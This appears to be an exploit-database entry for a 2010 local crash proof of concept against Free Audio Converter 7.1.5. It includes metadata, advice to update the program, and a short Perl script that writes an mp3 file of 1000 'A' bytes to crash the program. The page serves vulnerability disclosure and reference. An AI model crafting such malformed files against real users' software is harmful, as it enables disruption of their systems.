header-logo
Suggest Exploit
vendor:
Free Audio Converter
by:
h1ch4m
7,5
CVSS
HIGH
Local Crash
119
CWE
Product Name: Free Audio Converter
Affected Version From: 7.1.5
Affected Version To: 7.1.5
Patch Exists: Yes
Related CWE: N/A
CPE: free-audio-converter.net
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
2010

Free Audio Converter 7.1.5 Local Crash PoC

This exploit creates a malicious mp3 file with 1000 A characters which causes the Free Audio Converter 7.1.5 to crash when opened.

Mitigation:

Update to the latest version of Free Audio Converter.
Source

Exploit-DB raw data:

####
####
####Exploit Title: Free Audio Converter 7.1.5 Local Crash PoC
####Software Link: http://www.free-audio-converter.net/
####Tested on: Win XP SP3
####Date: 04-12-2010
####Author:  h1ch4m
####Email: h1ch4m@live.fr
####
####


#Note: all vendor's products are affected.
my $file= "1.mp3";
my $junk = "\x41" x 1000;
open($FILE,">$file");
print $FILE $junk;
close($FILE);
print "File Created successfully\n";
sleep(1);